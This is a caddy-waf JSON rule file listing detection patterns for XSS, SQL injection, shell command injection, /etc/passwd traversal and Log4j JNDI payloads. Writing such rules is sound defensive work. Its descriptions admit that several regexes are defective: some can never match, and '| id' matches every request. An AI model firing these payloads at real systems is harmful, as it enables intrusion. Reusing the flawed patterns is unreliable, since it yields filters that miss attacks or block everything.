caddy-waf/rules/vulnerability.json
2025-01-13 12:45:18 +01:00


[
{
"id": "xss-0",
"phase": 2,
"pattern": "(?i)<script>alert(1)</script>",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
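"description": "Detects xss attack payload: <script>alert(1)</script> (caveat: the unescaped parentheses in the pattern form a regex group, so it matches alert1 rather than the literal alert(1); escape them as \\( and \\))"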
},
{
"id": "xss-1",
"phase": 2,
"pattern": "(?i)<img src=x onerror=alert(1)>",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
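"description": "Detects xss attack payload: <img src=x onerror=alert(1)> (caveat: the unescaped parentheses in the pattern form a regex group, so it matches alert1 rather than the literal alert(1); escape them as \\( and \\))"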
},
{
"id": "xss-2",
"phase": 2,
"pattern": "(?i)javascript:alert(1)",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
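"description": "Detects xss attack payload: javascript:alert(1) (caveat: the unescaped parentheses in the pattern form a regex group, so it matches alert1 rather than the literal alert(1); escape them as \\( and \\))"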
},
{
"id": "xss-3",
"phase": 2,
"pattern": "(?i)data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects xss attack payload: data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
},
{
"id": "sqli-4",
"phase": 2,
"pattern": "(?i)1' OR '1'='1",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects sqli attack payload: 1' OR '1'='1"
},
{
"id": "sqli-5",
"phase": 2,
"pattern": "(?i)'; SELECT * FROM users;",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
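"description": "Detects sqli attack payload: '; SELECT * FROM users; (caveat: the unescaped * in the pattern is a regex quantifier on the preceding space, so the literal payload containing * is not matched; escape it as \\*)"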
},
{
"id": "sqli-6",
"phase": 2,
"pattern": "(?i)\" OR \"1\"=\"1",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects sqli attack payload: \" OR \"1\"=\"1"
},
{
"id": "sqli-7",
"phase": 2,
"pattern": "(?i)UNION SELECT 1,2,3;",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects sqli attack payload: UNION SELECT 1,2,3;"
},
{
"id": "rce-8",
"phase": 2,
"pattern": "(?i)`whoami`",
"targets": [
"ARGS",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects rce attack payload: `whoami`"
},
{
"id": "rce-9",
"phase": 2,
"pattern": "(?i)$(whoami)",
"targets": [
"ARGS",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
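"description": "Detects rce attack payload: $(whoami) (caveat: the unescaped $ in the pattern is an end-of-input anchor followed by a group, so the pattern as written cannot match this payload; escape it as \\$\\(whoami\\))"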
},
{
"id": "rce-10",
"phase": 2,
"pattern": "(?i); ls -la;",
"targets": [
"ARGS",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects rce attack payload: ; ls -la;"
},
{
"id": "rce-11",
"phase": 2,
"pattern": "(?i)| id",
"targets": [
"ARGS",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
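"description": "Detects rce attack payload: | id (caveat: the unescaped | in the pattern is a regex alternation with an empty left branch, which matches any input, so this rule can fire on every inspected request; escape it as \\|)"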
},
{
"id": "lfi-12",
"phase": 2,
"pattern": "(?i)../etc/passwd",
"targets": [
"URI"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects lfi attack payload: ../etc/passwd"
},
{
"id": "lfi-13",
"phase": 2,
"pattern": "(?i)../../../../etc/passwd",
"targets": [
"URI"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects lfi attack payload: ../../../../etc/passwd"
},
{
"id": "log4j-14",
"phase": 2,
"pattern": "(?i)${jndi:ldap://example.com/a}",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
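"description": "Detects log4j attack payload: ${jndi:ldap://example.com/a} (caveat: the unescaped $ in the pattern is an end-of-input anchor, so the pattern as written cannot match this payload; escape it as \\$, and note the rule only covers this one example.com URL)"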
},
{
"id": "log4j-15",
"phase": 2,
"pattern": "(?i)${jndi:rmi://example.com/b}",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
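"description": "Detects log4j attack payload: ${jndi:rmi://example.com/b} (caveat: the unescaped $ in the pattern is an end-of-input anchor, so the pattern as written cannot match this payload; escape it as \\$, and note the rule only covers this one example.com URL)"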
},
{
"id": "log4j-16",
"phase": 2,
"pattern": "(?i)${jndi:dns://example.com/c}",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
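"description": "Detects log4j attack payload: ${jndi:dns://example.com/c} (caveat: the unescaped $ in the pattern is an end-of-input anchor, so the pattern as written cannot match this payload; escape it as \\$, and note the rule only covers this one example.com URL)"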
}
]